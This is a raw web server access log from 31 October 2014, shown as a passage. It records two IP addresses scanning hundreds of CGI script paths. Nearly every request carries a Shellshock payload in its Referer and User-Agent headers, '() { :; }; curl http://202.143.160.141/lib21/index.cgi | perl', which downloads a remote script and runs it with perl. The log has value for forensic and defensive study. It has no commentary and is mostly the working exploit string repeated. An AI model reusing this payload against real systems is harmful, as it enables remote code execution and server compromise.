http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:18 +0200] "GET /cgi-bin/gm-cplog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:21 +0200] "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:22 +0200] "GET /cgi-bin/gbadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:54 +0200] "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:58 +0200] "GET /cgi-bin/csv_db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:02 +0200] "GET /cgi-bin/csNews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:04 +0200] "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:06 +0200] "GET /cgi-bin/csChatRBox.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:06 +0200] "GET /cgi-bin/Count.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:13 +0200] "GET /cgi-bin/classified.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:15 +0200] "GET /cgi-bin/cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:17 +0200] "GET /cgi-bin/ccvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:21 +0200] "GET /cgi-bin/cached_feed.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:29 +0200] "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:31 +0200] "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:31 +0200] "GET /cgi-bin/bigconf.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:31 +0200] "GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:32 +0200] "GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:36 +0200] "GET /cgi-bin/bb-hist.shHTTP/1.0" 503 323 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:29:36 +0200] "GET /cgi-bin/bb-ack.shHTTP/1.0" 503 323 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:29:40 +0200] "GET /cgi-bin/axs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:40 +0200] "GET /cgi-bin/ax.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:40 +0200] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:41 +0200] "GET /cgi-bin/auktion.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:56 +0200] "GET /cgi-bin/adduser.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:30:00 +0200] "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:29:58 +0200] "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:30:03 +0200] "GET /cgi-bin/14all-1.1.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:30:07 +0200] "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:30:07 +0200] "GET /cgi-bin-sdb/printenvHTTP/1.0" 404 226 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:30:13 +0200] "GET /bandwidth/index.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:30:17 +0200] "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:23 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:35:25 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:31 +0200] "GET /cgi-bin/status HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:33 +0200] "GET /gitweb.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:33 +0200] "GET /gitweb/gitweb.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:36 +0200] "GET /cgi-bin/php5 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:36 +0200] "GET /cgi-bin/php4 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:37 +0200] "GET /cgi-bin/php.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:43 +0200] "GET /cgi-bin/tree.php HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:44 +0200] "GET /cgi-bin/hello HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:45 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:45 +0200] "GET /cgi-bin/status/status.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:45 +0200] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 459 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:45 +0200] "GET /wwwboard.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:46 +0200] "GET /wwwadmin.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:46 +0200] "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:48 +0200] "GET /webtools/bonsai/cvslog.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:49 +0200] "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0" 404 467 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:50 +0200] "GET /users/scripts/submit.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:50 +0200] "GET /userreg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:50 +0200] "GET /upload.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:54 +0200] "GET /submit.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:55 +0200] "GET /siteUserMod.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:55 +0200] "GET /site_searcher.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:55 +0200] "GET /shop/normal_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:55 +0200] "GET /shop/member_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:55 +0200] "GET /SetSecurity.shmHTTP/1.0" 404 221 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:35:56 +0200] "GET /servers/link.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:57 +0200] "GET /sampleposteddata.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:35:57 +0200] "GET /sample04.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:00 +0200] "GET /sample01.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:03 +0200] "GET /quikstore.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:03 +0200] "GET /quikmail/nph-emumail.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:09 +0200] "GET /page.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:13 +0200] "GET /musicqueue.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:14 +0200] "GET /ministats/admin.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:14 +0200] "GET /megabook/admin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:14 +0200] "GET /main.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:15 +0200] "GET /mailview.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:15 +0200] "GET /login.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:16 +0200] "GET /infosrch.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:19 +0200] "GET /hndUnblock.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:20 +0200] "GET /Gozila.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:20 +0200] "GET /fcgi-bin/echo2HTTP/1.0" 404 220 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:36:23 +0200] "GET /ez2000/ezadmin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:23 +0200] "GET /enter_bug.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:23 +0200] "GET /emumail.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:24 +0200] "GET /edittag/edittag.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:24 +0200] "GET /download.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:24 +0200] "GET /details.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:24 +0200] "GET /debug.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:26 +0200] "GET /dcboard.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:28 +0200] "GET /CSNews.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:29 +0200] "GET /cp/rac/nsManager.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:31 +0200] "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:33 +0200] "GET /cgi-sys/realsignup.cgi HTTP/1.0" 404 460 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:33 +0200] "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:33 +0200] "GET /cgi-sys/randhtml.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:37 +0200] "GET /cgi-sys/entropybanner.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:43 +0200] "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:46 +0200] "GET /cgi-bin/whois_raw.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:48 +0200] "GET /cgi-bin/webspirs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:36:57 +0200] "GET /cgi-bin/vpasswd.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:00 +0200] "GET /cgi-bin/viewcvs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:02 +0200] "GET /cgi-bin/upload.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:15 +0200] "GET /cgi-bin/talkback.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:22 +0200] "GET /cgi-bin/snorkerz.cmdHTTP/1.0" 503 323 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:37:22 +0200] "GET /cgi-bin/snorkerz.batHTTP/1.0" 503 323 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:37:35 +0200] "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:37 +0200] "GET /cgi-bin/responder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:39 +0200] "GET /cgi-bin/ratlog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:44 +0200] "GET /cgi-bin/probecontrol.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:47 +0200] "GET /cgi-bin/postcards.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:51 +0200] "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:53 +0200] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:54 +0200] "GET /cgi-bin/perlshop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:54 +0200] "GET /cgi-bin/pbcgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:37:58 +0200] "GET /cgi-bin/nph-emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:00 +0200] "GET /cgi-bin/netpad.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:08 +0200] "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:12 +0200] "GET /cgi-bin/main_menu.plHTTP/1.0" 503 323 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:38:13 +0200] "GET /cgi-bin/main.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:13 +0200] "GET /cgi-bin/mailnews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:13 +0200] "GET /cgi-bin/maillist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:13 +0200] "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:13 +0200] "GET /cgi-bin/mail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:16 +0200] "GET /cgi-bin/lookwho.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:16 +0200] "GET /cgi-bin/logit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:18 +0200] "GET /cgi-bin/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:19 +0200] "GET /cgi-bin/lastlines.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:25 +0200] "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; 